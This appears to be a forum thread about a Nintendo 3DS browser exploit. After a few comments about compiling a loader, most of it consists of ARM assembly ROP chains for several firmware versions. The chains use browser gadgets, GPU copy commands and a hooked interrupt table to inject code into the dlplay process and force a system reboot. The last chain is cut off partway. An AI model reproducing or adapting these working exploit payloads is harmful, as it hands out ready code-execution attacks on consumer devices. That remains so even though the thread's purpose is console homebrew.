It would be nice if a Gold Pants Mii could be used through this exploit; surely I could help many friends at our meet-ups. Someone mentioned this should be possible yesterday in this same thread, iirc...
I think it would be able to, since this exploit digs in RAM and changes it.

Miis are stored on the SD, and are possible to change via extData.

Miis seem to be on extdata but not on SD.

Oh? I could have sworn, but I'm sure you're right.

Could someone perhaps compile https://github.com/yifanlu/Spider3DSTools/wiki/RegionThree-Loading please? Maybe duke_srg could?

I'll try to do so today as soon as LoadCode parameter passing to code is fixed. But are you sure you need it? It is the same regionthree but with no ROP/Launcher.DAT file on the SD.

Well, it's just easier and would be nice as it could also add compatibility, considering it's not launching files on an SD card and it's using a different exploit.
EDIT: Also my antivirus blocks your website for some reason.

Yes, it will be a bit easier. I also will check code loading from site and injecting to the web part payload, as it seems no one knows the ROP size limit.

Which page? Anyway, blame your paranoid-mode antivirus.
.arm
.text
@define constants
#define DLPLAY_CODE_LOC_VA 0x00192800
#define DLPLAY_CODE_LOC (DLPLAY_CODE_LOC_VA-0x00100000+0x03F50000+0x14000000)
#define DLPLAY_HOOK_LOC (0x03FF3500+0x14000000)
#define DLPLAY_NSSHANDLE_LOC_VA 0x001A5200
#define SPIDER_GSPHEAPBUF 0x18370000
#define SPIDER_ROP_LOC 0x08B88400
.global _start
spiderRop:
@copy code to dlplay
@copy patch
.word 0x0010b5b4 @ pop {r0, r1, r2, r3, r4, pc}
.word SPIDER_GSPHEAPBUF @ r0 (dst)
.word SPIDER_ROP_LOC+dlplayCode @ r1 (src)
.word dlplayCode_end-dlplayCode @ r2 (size)
.word 0xDEADC0DE @ r3 (garbage)
.word 0xDEADC0DE @ r4 (garbage)
.word 0x00240B54 @ memcpy (ends in LDMFD SP!, {R4-R10,LR})
.word 0xDEADC0DE @ r4 (garbage)
.word 0xDEADC0DE @ r5 (garbage)
.word 0xDEADC0DE @ r6 (garbage)
.word 0xDEADC0DE @ r7 (garbage)
.word 0xDEADC0DE @ r8 (garbage)
.word 0xDEADC0DE @ r9 (garbage)
.word 0xDEADC0DE @ r10 (garbage)
@flush data cache
.word 0x0010b5b4 @ pop {r0, r1, r2, r3, r4, pc}
.word 0x003DA72C @ r0 (handle ptr)
.word 0xFFFF8001 @ r1 (kprocess handle)
.word SPIDER_GSPHEAPBUF @ r2 (address)
.word 0x00000200 @ r3 (size)
.word 0xDEADC0DE @ r4 (garbage)
.word 0x0013035C @ pop {lr, pc}
.word 0x001057c4 @ lr (pop {pc})
.word 0x0012c1e0 @ GSPGPU_FlushDataCache
@send GX command
.word 0x0010c2fc @ pop {r0, pc}
.word 0x3D7C40+0x58 @ r0 (nn__gxlow__CTR__detail__GetInterruptReceiver)
.word 0x00228af4 @ pop {r1, pc}
.word SPIDER_ROP_LOC+gxCommand @ r1 (cmd addr)
.word 0x0013035C @ pop {lr, pc}
.word 0x001057c4 @ lr (pop {pc})
.word 0x0012BF04 @ nn__gxlow__CTR__CmdReqQueueTx__TryEnqueue
@sleep for a bit
.word 0x0010c2fc @ pop {r0, pc}
.word 500000000 @ r0 (half second)
.word 0x00228af4 @ pop {r1, pc}
.word 0x00000000 @ r1 (nothing)
.word 0x0013035C @ pop {lr, pc}
.word 0x001057c4 @ lr (pop {pc})
.word 0x001041f8 @ svc 0xa | bx lr
@copy gsp interrupt handler table to linear heap
@flush data cache
.word 0x0010b5b4 @ pop {r0, r1, r2, r3, r4, pc}
.word 0x003DA72C @ r0 (handle ptr)
.word 0xFFFF8001 @ r1 (kprocess handle)
.word SPIDER_GSPHEAPBUF @ r2 (address)
.word 0x00000200 @ r3 (size)
.word 0xDEADC0DE @ r4 (garbage)
.word 0x0013035C @ pop {lr, pc}
.word 0x001057c4 @ lr (pop {pc})
.word 0x0012c1e0 @ GSPGPU_FlushDataCache
@send GX command
.word 0x0010c2fc @ pop {r0, pc}
.word 0x3D7C40+0x58 @ r0 (nn__gxlow__CTR__detail__GetInterruptReceiver)
.word 0x00228af4 @ pop {r1, pc}
.word SPIDER_ROP_LOC+gxCommand2 @ r1 (cmd addr)
.word 0x0013035C @ pop {lr, pc}
.word 0x001057c4 @ lr (pop {pc})
.word 0x0012BF04 @ nn__gxlow__CTR__CmdReqQueueTx__TryEnqueue
@sleep for a bit
.word 0x0010c2fc @ pop {r0, pc}
.word 500000000 @ r0 (half second)
.word 0x00228af4 @ pop {r1, pc}
.word 0x00000000 @ r1 (nothing)
.word 0x0013035C @ pop {lr, pc}
.word 0x001057c4 @ lr (pop {pc})
.word 0x001041f8 @ svc 0xa | bx lr
@ needed for ROP
.word 0x001946EB @ POP {R0-R4,R7,PC}
.word SPIDER_ROP_LOC+0x8C @ r0 (garbage)
.word 0xDEADC0DE @ r1 (garbage)
.word 0xDEADC0DE @ r2 (garbage)
.word 0xDEADC0DE @ r3 (garbage)
.word 0xDEADC0DE @ r4 (garbage)
.word 0xDEADC0DE @ r7 (garbage)
@copy gsp interrupt handler table back to dlplay after patching it
@patch table
.word 0x0010b5b4 @ pop {r0, r1, r2, r3, r4, pc}
.word SPIDER_GSPHEAPBUF+0x90 @ r0 (dst)
.word SPIDER_ROP_LOC+dlplayHook @ r1 (src)
.word dlplayHook_end-dlplayHook @ r2 (size)
.word 0xDEADC0DE @ r3 (garbage)
.word 0xDEADC0DE @ r4 (garbage)
.word 0x00240B54 @ memcpy (ends in LDMFD SP!, {R4-R10,LR})
.word SPIDER_ROP_LOC @ r4 (needed for rop)
.word 0x001057C4 @ r5 (needed for rop)
.word 0x001057C4 @ r6 (needed for rop)
.word 0xDEADC0DE @ r7 (garbage)
.word 0xDEADC0DE @ r8 (garbage)
.word 0xDEADC0DE @ r9 (garbage)
.word 0xDEADC0DE @ r10 (garbage)
@ needed for ROP
.word 0x001946EB @ POP {R0-R4,R7,PC}
.word 0xDEADC0DE @ r0 (garbage)
.word 0xDEADC0DE @ r1 (garbage)
.word 0xDEADC0DE @ r2 (garbage)
.word 0xDEADC0DE @ r3 (garbage)
.word 0x0010C2FC @ r4 (needed for rop)
.word SPIDER_ROP_LOC+0x218 @ r7 (needed for rop)
@ needed for ROP
.word 0x001946EB @ POP {R0-R4,R7,PC}
.word 0xDEADC0DE @ r0 (garbage)
.word 0x001057C4 @ r1 (garbage)
.word 0xDEADC0DE @ r2 (garbage)
.word 0xDEADC0DE @ r3 (garbage)
.word 0xDEADC0DE @ r4 (garbage)
.word 0xDEADC0DE @ r7 (garbage)
@flush data cache
.word 0x0010b5b4 @ pop {r0, r1, r2, r3, r4, pc}
.word 0x003DA72C @ r0 (handle ptr)
.word 0xFFFF8001 @ r1 (kprocess handle)
.word SPIDER_GSPHEAPBUF @ r2 (address)
.word 0x00000200 @ r3 (size)
.word 0xDEADC0DE @ r4 (garbage)
.word 0x0013035C @ pop {lr, pc}
.word 0x001057c4 @ lr (pop {pc})
.word 0x0012c1e0 @ GSPGPU_FlushDataCache
@send GX command
.word 0x0010c2fc @ pop {r0, pc}
.word 0x3D7C40+0x58 @ r0 (nn__gxlow__CTR__detail__GetInterruptReceiver)
.word 0x00228af4 @ pop {r1, pc}
.word SPIDER_ROP_LOC+gxCommand3 @ r1 (cmd addr)
.word 0x0013035C @ pop {lr, pc}
.word 0x001057c4 @ lr (pop {pc})
.word 0x0012BF04 @ nn__gxlow__CTR__CmdReqQueueTx__TryEnqueue
@trigger spider crash to return to menu
.word 0xFFFFFFFF
@ copy code stub to end of dlplay .text
.align 0x4
gxCommand:
.word 0x00000004 @command header (SetTextureCopy)
.word SPIDER_GSPHEAPBUF @source address
.word DLPLAY_CODE_LOC @destination address
.word 0x200 @size
.word 0xFFFFFFFF @ dim in
.word 0xFFFFFFFF @ dim out
.word 0x00000008 @ flags
.word 0x00000000 @ unused
@ needed for ROP
.word 0xDEADC0DE
.word 0xDEADC0DE
.word 0xDEADC0DE
.word 0xDEADC0DE
.word 0xDEADC0DE
.word 0xDEADC0DE
myself:
.word SPIDER_ROP_LOC+myself
.word 0x001057C4
.word 0xDEADC0DE
.word 0xDEADC0DE
.word 0xDEADC0DE
.word 0xDEADC0DE
.word 0xDEADC0DE
.word 0xDEADC0DE
.word 0xDEADC0DE
.word 0x00130344
@ copy gsp interrupt handler ptr table to spider linear heap
.align 0x4
gxCommand2:
.word 0x00000004 @command header (SetTextureCopy)
.word DLPLAY_HOOK_LOC @source address
.word SPIDER_GSPHEAPBUF @destination address
.word 0x200 @size
.word 0xFFFFFFFF @ dim in
.word 0xFFFFFFFF @ dim out
.word 0x00000008 @ flags
.word 0x00000000 @ unused
@ copy gsp interrupt handler ptr table back to dlplay from spider linear heap
.align 0x4
gxCommand3:
.word 0x00000004 @command header (SetTextureCopy)
.word SPIDER_GSPHEAPBUF @source address
.word DLPLAY_HOOK_LOC @destination address
.word 0x200 @size
.word 0xFFFFFFFF @ dim in
.word 0xFFFFFFFF @ dim out
.word 0x00000008 @ flags
.word 0x00130344 @ unused
.align 0x4
dlplayCode:
ldr r0, =DLPLAY_NSSHANDLE_LOC_VA @ ns:s handle location
ldr r0, [r0]
mrc p15, 0, r1, c13, c0, 3 @ r1 = thread-local storage pointer
add r1, #0x80 @ IPC command buffer lives at TLS+0x80
ldr r2, =0x00100180 @ NSS:RebootSystem
str r2, [r1], #4
ldr r2, =0x00000001 @ flag
str r2, [r1], #4
ldr r2, =0x00000000 @ lower word PID (0 for gamecard)
str r2, [r1], #4
ldr r2, =0x00000000 @ upper word PID
str r2, [r1], #4
ldr r2, =0x00000002 @ mediatype (2 for gamecard)
str r2, [r1], #4
ldr r2, =0x00000000 @ reserved
str r2, [r1], #4
ldr r2, =0x00000000 @ flag
str r2, [r1], #4
.word 0xef000032 @ svc 0x32 (sendsyncrequest)
@sleep forever and ever...
ldr r0, =0xFFFFFFFF
ldr r1, =0x0FFFFFFF
.word 0xef00000a @ svc 0xa (sleep)
.pool
dlplayCode_end:
.align 0x4
dlplayHook:
.word DLPLAY_CODE_LOC_VA, DLPLAY_CODE_LOC_VA, DLPLAY_CODE_LOC_VA, DLPLAY_CODE_LOC_VA
.word DLPLAY_CODE_LOC_VA, DLPLAY_CODE_LOC_VA
dlplayHook_end:
.arm
.text
@define constants
#define DLPLAY_CODE_LOC_VA 0x00192800
#define DLPLAY_CODE_LOC (DLPLAY_CODE_LOC_VA-0x00100000+0x03F50000+0x14000000)
#define DLPLAY_HOOK_LOC (0x03FF3500+0x14000000)
#define DLPLAY_NSSHANDLE_LOC_VA 0x001A5200
#define SPIDER_GSPHEAPBUF 0x18370000
#define SPIDER_ROP_LOC 0x08B88400
.global _start
spiderRop:
@copy code to dlplay
@copy patch
.word 0x0010b5b4 @ pop {r0, r1, r2, r3, r4, pc}
.word SPIDER_GSPHEAPBUF @ r0 (dst)
.word SPIDER_ROP_LOC+dlplayCode @ r1 (src)
.word dlplayCode_end-dlplayCode @ r2 (size)
.word 0xDEADC0DE @ r3 (garbage)
.word 0xDEADC0DE @ r4 (garbage)
.word 0x00240B54 @ memcpy (ends in LDMFD SP!, {R4-R10,LR})
.word 0xDEADC0DE @ r4 (garbage)
.word 0xDEADC0DE @ r5 (garbage)
.word 0xDEADC0DE @ r6 (garbage)
.word 0xDEADC0DE @ r7 (garbage)
.word 0xDEADC0DE @ r8 (garbage)
.word 0xDEADC0DE @ r9 (garbage)
.word 0xDEADC0DE @ r10 (garbage)
@flush data cache
.word 0x0010b5b4 @ pop {r0, r1, r2, r3, r4, pc}
.word 0x003DA72C @ r0 (handle ptr)
.word 0xFFFF8001 @ r1 (kprocess handle)
.word SPIDER_GSPHEAPBUF @ r2 (address)
.word 0x00000200 @ r3 (size)
.word 0xDEADC0DE @ r4 (garbage)
.word 0x0013035C @ pop {lr, pc}
.word 0x001057c4 @ lr (pop {pc})
.word 0x0012c1e0 @ GSPGPU_FlushDataCache
@send GX command
.word 0x0010c2fc @ pop {r0, pc}
.word 0x3D7C40+0x58 @ r0 (nn__gxlow__CTR__detail__GetInterruptReceiver)
.word 0x00228af4 @ pop {r1, pc}
.word SPIDER_ROP_LOC+gxCommand @ r1 (cmd addr)
.word 0x0013035C @ pop {lr, pc}
.word 0x001057c4 @ lr (pop {pc})
.word 0x0012BF04 @ nn__gxlow__CTR__CmdReqQueueTx__TryEnqueue
@sleep for a bit
.word 0x0010c2fc @ pop {r0, pc}
.word 500000000 @ r0 (half second)
.word 0x00228af4 @ pop {r1, pc}
.word 0x00000000 @ r1 (nothing)
.word 0x0013035C @ pop {lr, pc}
.word 0x001057c4 @ lr (pop {pc})
.word 0x001041f8 @ svc 0xa | bx lr
@copy gsp interrupt handler table to linear heap
@flush data cache
.word 0x0010b5b4 @ pop {r0, r1, r2, r3, r4, pc}
.word 0x003DA72C @ r0 (handle ptr)
.word 0xFFFF8001 @ r1 (kprocess handle)
.word SPIDER_GSPHEAPBUF @ r2 (address)
.word 0x00000200 @ r3 (size)
.word 0xDEADC0DE @ r4 (garbage)
.word 0x0013035C @ pop {lr, pc}
.word 0x001057c4 @ lr (pop {pc})
.word 0x0012c1e0 @ GSPGPU_FlushDataCache
@send GX command
.word 0x0010c2fc @ pop {r0, pc}
.word 0x3D7C40+0x58 @ r0 (nn__gxlow__CTR__detail__GetInterruptReceiver)
.word 0x00228af4 @ pop {r1, pc}
.word SPIDER_ROP_LOC+gxCommand2 @ r1 (cmd addr)
.word 0x0013035C @ pop {lr, pc}
.word 0x001057c4 @ lr (pop {pc})
.word 0x0012BF04 @ nn__gxlow__CTR__CmdReqQueueTx__TryEnqueue
@sleep for a bit
.word 0x0010c2fc @ pop {r0, pc}
.word 500000000 @ r0 (half second)
.word 0x00228af4 @ pop {r1, pc}
.word 0x00000000 @ r1 (nothing)
.word 0x0013035C @ pop {lr, pc}
.word 0x001057c4 @ lr (pop {pc})
.word 0x001041f8 @ svc 0xa | bx lr
@ needed for ROP
.word 0x0010C2FC @ pop {r0, pc}
.word SPIDER_ROP_LOC+0x8C @ r0 InitData 1
@copy gsp interrupt handler table back to dlplay after patching it
@patch table
.word 0x0010b5b4 @ pop {r0, r1, r2, r3, r4, pc}
.word SPIDER_GSPHEAPBUF+0x90 @ r0 (dst)
.word SPIDER_ROP_LOC+dlplayHook @ r1 (src)
.word dlplayHook_end-dlplayHook @ r2 (size)
.word 0xDEADC0DE @ r3 (garbage)
.word 0xDEADC0DE @ r4 (garbage)
.word 0x00240B54 @ memcpy (ends in LDMFD SP!, {R4-R10,LR})
.word 0xDEADC0DE @ r4 (garbage)
.word 0xDEADC0DE @ r5 (garbage)
.word 0xDEADC0DE @ r6 (garbage)
.word 0xDEADC0DE @ r7 (garbage)
.word 0xDEADC0DE @ r8 (garbage)
.word SPIDER_ROP_LOC @ r9 (needed for rop) InitData 2
.word 0x001057C4 @ r10 (needed for rop) InitData 3
.word 0x001057C4 @ POP {PC} (needed for rop) InitData 4
@flush data cache
.word 0x0010b5b4 @ pop {r0, r1, r2, r3, r4, pc}
.word 0x003DA72C @ r0 (handle ptr)
.word 0xFFFF8001 @ r1 (kprocess handle)
.word SPIDER_GSPHEAPBUF @ r2 (address)
.word 0x00000200 @ r3 (size)
.word 0xDEADC0DE @ r4 (garbage)
.word 0x0013035C @ pop {lr, pc}
.word 0x001057c4 @ lr (pop {pc})
.word 0x0012c1e0 @ GSPGPU_FlushDataCache
@ needed for ROP
.word 0x0010C2FC @ pop {r0, pc} (needed for rop) InitData 5
.word SPIDER_ROP_LOC+0x218 @ r7 (needed for rop) InitData 6
@send GX command
.word 0x0010c2fc @ pop {r0, pc}
.word 0x3D7C40+0x58 @ r0 (nn__gxlow__CTR__detail__GetInterruptReceiver)
.word 0x00228af4 @ pop {r1, pc}
.word SPIDER_ROP_LOC+gxCommand3 @ r1 (cmd addr)
.word 0x0013035C @ pop {lr, pc}
.word 0x001057c4 @ lr (pop {pc})
.word 0x0012BF04 @ nn__gxlow__CTR__CmdReqQueueTx__TryEnqueue
@trigger spider crash to return to menu
.word 0xFFFFFFFF
@ copy code stub to end of dlplay .text
.align 0x4
gxCommand:
.word 0x00000004 @command header (SetTextureCopy)
.word SPIDER_GSPHEAPBUF @source address
.word DLPLAY_CODE_LOC @destination address
.word 0x200 @size
.word 0xFFFFFFFF @ dim in
.word 0xFFFFFFFF @ dim out
.word 0x00000008 @ flags
.word 0x00000000 @ unused
@ copy gsp interrupt handler ptr table to spider linear heap
.align 0x4
gxCommand2:
.word 0x00000004 @command header (SetTextureCopy)
.word DLPLAY_HOOK_LOC @source address
.word SPIDER_GSPHEAPBUF @destination address
.word 0x200 @size
.word 0xFFFFFFFF @ dim in
.word 0xFFFFFFFF @ dim out
.word 0x00000008 @ flags
.word 0x00000000 @ unused
@ copy gsp interrupt handler ptr table back to dlplay from spider linear heap
.align 0x4
gxCommand3:
.word 0x00000004 @command header (SetTextureCopy)
.word SPIDER_GSPHEAPBUF @source address
.word DLPLAY_HOOK_LOC @destination address
.word 0x200 @size
.word 0xFFFFFFFF @ dim in
.word 0xFFFFFFFF @ dim out
.word 0x00000008 @ flags
.word 0x00000000 @ unused
.align 0x4
dlplayHook:
.word DLPLAY_CODE_LOC_VA, DLPLAY_CODE_LOC_VA, DLPLAY_CODE_LOC_VA, DLPLAY_CODE_LOC_VA
.word DLPLAY_CODE_LOC_VA, DLPLAY_CODE_LOC_VA
dlplayHook_end:
myself:
.word SPIDER_ROP_LOC+myself @ Self 1
.word 0x001057C4 @ Self 2
.fill 7, 4, 0xDEADC0DE
.word 0x00130344 @ Self 3
.align 0x4
dlplayCode:
ldr r0, =DLPLAY_NSSHANDLE_LOC_VA @ ns:s handle location
ldr r0, [r0]
mrc p15, 0, r1, c13, c0, 3 @ r1 = thread-local storage pointer
add r1, #0x80 @ IPC command buffer lives at TLS+0x80
ldr r2, =0x00100180 @ NSS:RebootSystem
str r2, [r1], #4
ldr r2, =0x00000001 @ flag
str r2, [r1], #4
ldr r2, =0x00000000 @ lower word PID (0 for gamecard)
str r2, [r1], #4
ldr r2, =0x00000000 @ upper word PID
str r2, [r1], #4
ldr r2, =0x00000002 @ mediatype (2 for gamecard)
str r2, [r1], #4
ldr r2, =0x00000000 @ reserved
str r2, [r1], #4
ldr r2, =0x00000000 @ flag
str r2, [r1], #4
.word 0xef000032 @ svc 0x32 (sendsyncrequest)
@sleep forever and ever...
ldr r0, =0xFFFFFFFF
ldr r1, =0x0FFFFFFF
.word 0xef00000a @ svc 0xa (sleep)
.pool
dlplayCode_end:
.arm
.text
@define constants
#define DLPLAY_CODE_LOC_VA 0x00192800
#define DLPLAY_CODE_LOC (DLPLAY_CODE_LOC_VA-0x00100000+0x03F50000+0x14000000-0x4000)
#define DLPLAY_HOOK_LOC (0x1A3500-0x00100000+0x03F50000+0x14000000-0x4000)
#define DLPLAY_NSSHANDLE_LOC_VA 0x001A5200
#define SPIDER_GSPHEAPBUF 0x18410000
#define SPIDER_ROP_LOC 0x08B47400
.global _start
spiderRop:
@copy code to dlplay
@copy patch
.word 0x0029C170 @ LDMFD SP!, {R0-R4,PC}
.word SPIDER_GSPHEAPBUF @ r0 (dst)
.word SPIDER_ROP_LOC+dlplayCode @ r1 (src)
.word dlplayCode_end-dlplayCode @ r2 (size)
.word 0xDEADC0DE @ r3 (garbage)
.word 0xDEADC0DE @ r4 (garbage)
.word 0x0029BF64 @ memcpy (ends in LDMFD SP!, {R4-R10,LR})
.word 0xDEADC0DE @ r4 (garbage)
.word 0xDEADC0DE @ r5 (garbage)
.word 0xDEADC0DE @ r6 (garbage)
.word 0xDEADC0DE @ r7 (garbage)
.word 0xDEADC0DE @ r8 (garbage)
.word 0xDEADC0DE @ r9 (garbage)
.word 0xDEADC0DE @ r10 (garbage)
@flush data cache
.word 0x0029C170 @ pop {r0, r1, r2, r3, r4, pc}
.word 0x003B643C @ r0 (handle ptr)
.word 0xFFFF8001 @ r1 (kprocess handle)
.word SPIDER_GSPHEAPBUF @ r2 (address)
.word 0x00000200 @ r3 (size)
.word 0xDEADC0DE @ r4 (garbage)
.word 0x002D6A34 @ pop {lr, pc}
.word 0x0010DB6C @ lr (pop {pc})
.word 0x00344C2C @ GSPGPU_FlushDataCache
@send GX command
.word 0x002AD574 @ pop {r0, pc}
.word 0x003F54E8+0x58 @ r0 (nn__gxlow__CTR__detail__GetInterruptReceiver)
.word 0x00269758 @ pop {r1, pc}
.word SPIDER_ROP_LOC+gxCommand @ r1 (cmd addr)
.word 0x002D6A34 @ pop {lr, pc}
.word 0x0010DB6C @ lr (pop {pc})
.word 0x002CF3EC @ nn__gxlow__CTR__CmdReqQueueTx__TryEnqueue
@sleep for a bit
.word 0x002AD574 @ pop {r0, pc}
.word 500000000 @ r0 (half second)
.word 0x00269758 @ pop {r1, pc}
.word 0x00000000 @ r1 (nothing)
.word 0x002D6A34 @ pop {lr, pc}
.word 0x0010DB6C @ lr (pop {pc})
.word 0x002A513C @ svc 0xa | bx lr
@copy gsp interrupt handler table to linear heap
@flush data cache
.word 0x0029C170 @ pop {r0, r1, r2, r3, r4, pc}
.word 0x003B643C @ r0 (handle ptr)
.word 0xFFFF8001 @ r1 (kprocess handle)
.word SPIDER_GSPHEAPBUF @ r2 (address)
.word 0x00000200 @ r3 (size)
.word 0xDEADC0DE @ r4 (garbage)
.word 0x002D6A34 @ pop {lr, pc}
.word 0x0010DB6C @ lr (pop {pc})
.word 0x00344C2C @ GSPGPU_FlushDataCache
@send GX command
.word 0x002AD574 @ pop {r0, pc}
.word 0x003F54E8+0x58 @ r0 (nn__gxlow__CTR__detail__GetInterruptReceiver)
.word 0x00269758 @ pop {r1, pc}
.word SPIDER_ROP_LOC+gxCommand2 @ r1 (cmd addr)
.word 0x002D6A34 @ pop {lr, pc}
.word 0x0010DB6C @ lr (pop {pc})
.word 0x002CF3EC @ nn__gxlow__CTR__CmdReqQueueTx__TryEnqueue
@sleep for a bit
.word 0x002AD574 @ pop {r0, pc}
.word 500000000 @ r0 (half second)
.word 0x00269758 @ pop {r1, pc}
.word 0x00000000 @ r1 (nothing)
.word 0x002D6A34 @ pop {lr, pc}
.word 0x0010DB6C @ lr (pop {pc})
.word 0x002A513C @ svc 0xa | bx lr
@ needed for ROP
.word 0x002AD574 @ pop {r0, pc}
.word SPIDER_ROP_LOC+0x8C @ r0 InitData 1
@copy gsp interrupt handler table back to dlplay after patching it
@patch table
.word 0x0029C170 @ LDMFD SP!, {R0-R4,PC}
.word SPIDER_GSPHEAPBUF+0x90 @ r0 (dst)
.word SPIDER_ROP_LOC+dlplayHook @ r1 (src)
.word dlplayHook_end-dlplayHook @ r2 (size)
.word 0xDEADC0DE @ r3 (garbage)
.word 0xDEADC0DE @ r4 (garbage)
.word 0x0029BF64 @ memcpy (ends in LDMFD SP!, {R4-R10,LR})
.word 0xDEADC0DE @ r4 (garbage)
.word 0xDEADC0DE @ r5 (garbage)
.word 0xDEADC0DE @ r6 (garbage)
.word 0xDEADC0DE @ r7 (garbage)
.word 0xDEADC0DE @ r8 (garbage)
.word SPIDER_ROP_LOC @ r9 (needed for rop) InitData 2
.word 0x0010DB6C @ r10 (needed for rop) InitData 3
.word 0x0010DB6C @ POP {PC} (needed for rop) InitData 4
@flush data cache
.word 0x0029C170 @ pop {r0, r1, r2, r3, r4, pc}
.word 0x003B643C @ r0 (handle ptr)
.word 0xFFFF8001 @ r1 (kprocess handle)
.word SPIDER_GSPHEAPBUF @ r2 (address)
.word 0x00000200 @ r3 (size)
.word 0xDEADC0DE @ r4 (garbage)
.word 0x002D6A34 @ pop {lr, pc}
.word 0x0010DB6C @ lr (pop {pc})
.word 0x00344C2C @ GSPGPU_FlushDataCache
@ needed for ROP
.word 0x002AD574 @ pop {r0, pc} (needed for rop) InitData 5
.word SPIDER_ROP_LOC+0x218 @ r7 (needed for rop) InitData 6
@send GX command
.word 0x002AD574 @ pop {r0, pc}
.word 0x003F54E8+0x58 @ r0 (nn__gxlow__CTR__detail__GetInterruptReceiver)
.word 0x00269758 @ pop {r1, pc}
.word SPIDER_ROP_LOC+gxCommand3 @ r1 (cmd addr)
.word 0x002D6A34 @ pop {lr, pc}
.word 0x0010DB6C @ lr (pop {pc})
.word 0x002CF3EC @ nn__gxlow__CTR__CmdReqQueueTx__TryEnqueue
@trigger spider crash to return to menu
.word 0xFFFFFFFF
@ copy code stub to end of dlplay .text
.align 0x4
gxCommand:
.word 0x00000004 @command header (SetTextureCopy)
.word SPIDER_GSPHEAPBUF @source address
.word DLPLAY_CODE_LOC @destination address
.word 0x200 @size
.word 0xFFFFFFFF @ dim in
.word 0xFFFFFFFF @ dim out
.word 0x00000008 @ flags
.word 0x00000000 @ unused
@ copy gsp interrupt handler ptr table to spider linear heap
.align 0x4
gxCommand2:
.word 0x00000004 @command header (SetTextureCopy)
.word DLPLAY_HOOK_LOC @source address
.word SPIDER_GSPHEAPBUF @destination address
.word 0x200 @size
.word 0xFFFFFFFF @ dim in
.word 0xFFFFFFFF @ dim out
.word 0x00000008 @ flags
.word 0x00000000 @ unused
@ copy gsp interrupt handler ptr table back to dlplay from spider linear heap
.align 0x4
gxCommand3:
.word 0x00000004 @command header (SetTextureCopy)
.word SPIDER_GSPHEAPBUF @source address
.word DLPLAY_HOOK_LOC @destination address
.word 0x200 @size
.word 0xFFFFFFFF @ dim in
.word 0xFFFFFFFF @ dim out
.word 0x00000008 @ flags
.word 0x00000000 @ unused
.align 0x4
dlplayHook:
.word DLPLAY_CODE_LOC_VA, DLPLAY_CODE_LOC_VA, DLPLAY_CODE_LOC_VA, DLPLAY_CODE_LOC_VA
.word DLPLAY_CODE_LOC_VA, DLPLAY_CODE_LOC_VA
dlplayHook_end:
myself:
.word SPIDER_ROP_LOC+myself @ Self 1
.word 0x0010DB6C @ Self 2
.fill 7, 4, 0xDEADC0DE
.word 0x002D6A1C @ Self 3
.align 0x4
dlplayCode:
ldr r0, =DLPLAY_NSSHANDLE_LOC_VA @ ns:s handle location
ldr r0, [r0]
mrc p15, 0, r1, c13, c0, 3 @ r1 = thread-local storage pointer
add r1, #0x80 @ IPC command buffer lives at TLS+0x80
ldr r2, =0x00100180 @ NSS:RebootSystem
str r2, [r1], #4
ldr r2, =0x00000001 @ flag
str r2, [r1], #4
ldr r2, =0x00000000 @ lower word PID (0 for gamecard)
str r2, [r1], #4
ldr r2, =0x00000000 @ upper word PID
str r2, [r1], #4
ldr r2, =0x00000002 @ mediatype (2 for gamecard)
str r2, [r1], #4
ldr r2, =0x00000000 @ reserved
str r2, [r1], #4
ldr r2, =0x00000000 @ flag
str r2, [r1], #4
.word 0xef000032 @ svc 0x32 (sendsyncrequest)
@sleep forever and ever...
ldr r0, =0xFFFFFFFF
ldr r1, =0x0FFFFFFF
.word 0xef00000a @ svc 0xa (sleep)
.pool
dlplayCode_end:
.arm
.text
@define constants
#define DLPLAY_CODE_LOC_VA 0x00192800
#define DLPLAY_CODE_LOC (DLPLAY_CODE_LOC_VA-0x00100000+0x03F50000+0x14000000)
#define DLPLAY_HOOK_LOC (0x1A3500-0x00100000+0x03F50000+0x14000000)
#define DLPLAY_NSSHANDLE_LOC_VA 0x001A5200
#define SPIDER_GSPHEAPBUF 0x18410000
#define SPIDER_ROP_LOC 0x08B85400
.global _start
spiderRop:
@copy code to dlplay
@copy patch
.word 0x0012A3D4 @ LDMFD SP!, {R0-R4,PC}
.word SPIDER_GSPHEAPBUF @ r0 (dst)
.word SPIDER_ROP_LOC+dlplayCode @ r1 (src)
.word dlplayCode_end-dlplayCode @ r2 (size)
.word 0xDEADC0DE @ r3 (garbage)
.word 0xDEADC0DE @ r4 (garbage)
.word 0x00240B5C @ memcpy (ends in LDMFD SP!, {R4-R10,LR})
.word 0xDEADC0DE @ r4 (garbage)
.word 0xDEADC0DE @ r5 (garbage)
.word 0xDEADC0DE @ r6 (garbage)
.word 0xDEADC0DE @ r7 (garbage)
.word 0xDEADC0DE @ r8 (garbage)
.word 0xDEADC0DE @ r9 (garbage)
.word 0xDEADC0DE @ r10 (garbage)
@flush data cache
.word 0x0012A3D4 @ pop {r0, r1, r2, r3, r4, pc}
.word 0x003DA72C @ r0 (handle ptr)
.word 0xFFFF8001 @ r1 (kprocess handle)
.word SPIDER_GSPHEAPBUF @ r2 (address)
.word 0x00000200 @ r3 (size)
.word 0xDEADC0DE @ r4 (garbage)
.word 0x001303A4 @ pop {lr, pc}
.word 0x001057E0 @ lr (pop {pc})
.word 0x0012C228 @ GSPGPU_FlushDataCache
@send GX command
.word 0x0010C320 @ pop {r0, pc}
.word 0x3D7C40+0x58 @ r0 (nn__gxlow__CTR__detail__GetInterruptReceiver)
.word 0x00228B10 @ pop {r1, pc}
.word SPIDER_ROP_LOC+gxCommand @ r1 (cmd addr)
.word 0x001303A4 @ pop {lr, pc}
.word 0x001057E0 @ lr (pop {pc})
.word 0x0012BF4C @ nn__gxlow__CTR__CmdReqQueueTx__TryEnqueue
@sleep for a bit
.word 0x0010C320 @ pop {r0, pc}
.word 500000000 @ r0 (half second)
.word 0x00228B10 @ pop {r1, pc}
.word 0x00000000 @ r1 (nothing)
.word 0x001303A4 @ pop {lr, pc}
.word 0x001057E0 @ lr (pop {pc})
.word 0x0010420C @ svc 0xa | bx lr
@copy gsp interrupt handler table to linear heap
@flush data cache
.word 0x0012A3D4 @ pop {r0, r1, r2, r3, r4, pc}
.word 0x003DA72C @ r0 (handle ptr)
.word 0xFFFF8001 @ r1 (kprocess handle)
.word SPIDER_GSPHEAPBUF @ r2 (address)
.word 0x00000200 @ r3 (size)
.word 0xDEADC0DE @ r4 (garbage)
.word 0x001303A4 @ pop {lr, pc}
.word 0x001057E0 @ lr (pop {pc})
.word 0x0012C228 @ GSPGPU_FlushDataCache
@send GX command
.word 0x0010C320 @ pop {r0, pc}
.word 0x3D7C40+0x58 @ r0 (nn__gxlow__CTR__detail__GetInterruptReceiver)
.word 0x00228B10 @ pop {r1, pc}
